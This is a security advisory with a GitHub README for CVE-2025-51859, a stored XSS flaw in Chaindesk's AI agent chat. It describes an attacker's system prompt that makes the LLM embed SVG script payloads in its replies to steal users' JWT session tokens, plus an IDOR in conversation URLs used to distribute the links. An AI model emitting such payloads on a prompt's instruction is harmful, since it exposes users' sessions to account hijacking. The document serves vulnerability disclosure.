Chaindesk AI Agent 存储型跨站脚本漏洞
漏洞信息
漏洞名称: Chaindesk AI Agent 存储型跨站脚本漏洞
漏洞编号:
- CVE: CVE-2025-51859
漏洞类型: 跨站可执行脚本
漏洞等级: 高危
漏洞描述: Chaindesk是一款用于构建AI Agents的Web应用程序,广泛应用于企业和个人用户中,用于创建和管理AI驱动的聊天代理。该应用程序的代理聊天组件存在存储型跨站脚本(XSS)漏洞。攻击者可以通过构造一个AI代理,其系统提示指示底层大型语言模型(LLM)在其聊天响应中嵌入恶意脚本负载(例如基于SVG的XSS),从而实现任意客户端脚本执行。当用户与这种恶意代理交互或访问包含XSS负载的对话直接链接时,脚本将在用户的浏览器中执行。成功利用此漏洞可能导致敏感信息(如JWT会话令牌)被盗,进而可能导致账户劫持。此外,对话URL结构中的不安全直接对象引用(IDOR)漏洞(https://app.chaindesk.ai/agents/<agentID>?tab=chat&conversationId=<conversationID>)促进了这些恶意对话链接的分发,并可能带来未经授权访问其他聊天会话的风险。该漏洞的技术根源在于应用程序未能对用户输入进行适当的验证和清理,以及缺乏足够的访问控制检查。此漏洞的影响范围广泛,任何使用https://www.chaindesk.ai的用户都可能受到影响,特别是在与公共恶意代理通信时,用户的cookie(包含会话和令牌)可能会被盗。
产品厂商: Chaindesk
产品名称: Chaindesk AI Agent
来源: https://github.com/Secsys-FDU/CVE-2025-51859
类型: CVE-2025:github search
仓库文件
- README.md
- figure1.png
- figure2.png
来源概述
CVE-2025-51859
Vulnerability description
Chaindesk, a web application for constructing AI Agents, is vulnerable to Stored Cross-Site Scripting (XSS) in its agent chat component. An attacker can achieve arbitrary client-side script execution by crafting an AI agent whose system prompt instructs the underlying Large Language Model (LLM) to embed malicious script payloads (e.g., SVG-based XSS) into its chat responses. When a user interacts with such a malicious agent, or accesses a direct link to a conversation containing an XSS payload, the script executes in the user’s browser. Successful exploitation can lead to the theft of sensitive information, such as JWT session tokens, potentially resulting in account hijacking. An Insecure Direct Object Reference (IDOR) vulnerability in the conversation URL structure (https://app.chaindesk.ai/agents/<agentID>?tab=chat&conversationId=<conversationID>) facilitates the distribution of these malicious conversation links and may also pose a risk of unauthorized access to other chat sessions.
Attack Vectors
Chaindesk is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability within its AI agent chat functionality. This vulnerability impacts user interactions and conversation displays accessed via URLs such as https://app.chaindesk.ai/agents/<agentID>?tab=chat&conversationId=<conversationID>.
The primary method for exploiting this XSS involves an attacker creating an AI agent with a crafted system prompt. This malicious prompt directs the integrated Large Language Model (LLM) to generate responses containing an embedded SVG XSS payload. Consequently, when a victim engages in a chat with this compromised agent, the payload is rendered by the victim’s browser, leading to client-side script execution. This technique effectively uses the agent’s configuration to store and deliver the XSS payload. The execution of arbitrary JavaScript code in the victim’s session allows the attacker to steal sensitive data, notably JWT tokens, which can then be used for account hijacking. Figure 1 shows the the UI randering after user communicate with malicious agent, it leaks the session and token of user.
Furthermore, the application exhibits an Insecure Direct Object Reference (IDOR) vulnerability (also classifiable as Broken Access Control) concerning how conversation URLs are handled. The endpoint https://app.chaindesk.ai/agents/<agentID>?tab=chat&conversationId=<conversationID> primarily relies on agentID and conversationID parameters for displaying chat content, with apparently insufficient access control checks. This IDOR vulnerability allows an attacker to: a) Craft and distribute direct URLs pointing to conversations they control which contain an XSS payload (delivered either through the LLM method described above or potentially otherwise embedded). When a victim accesses such a URL, the XSS payload executes. b) Potentially access other users’ conversations if valid agentID and conversationID combinations can be identified. However, the initial report indicates that conversationID values may not be easily guessable for broad unauthorized access to pre-existing, unrelated conversations. Nonetheless, the IDOR’s utility in delivering XSS payloads to targeted victims remains a significant concern. Figure 2 shows the POC of IDOR vulnerabilty.
Vulnerability affected
This vulnerability can have an impact on any user of https://www.chaindesk.ai. The cookie (contains the session and token) of user will be stolen when communicates with public malicious agent.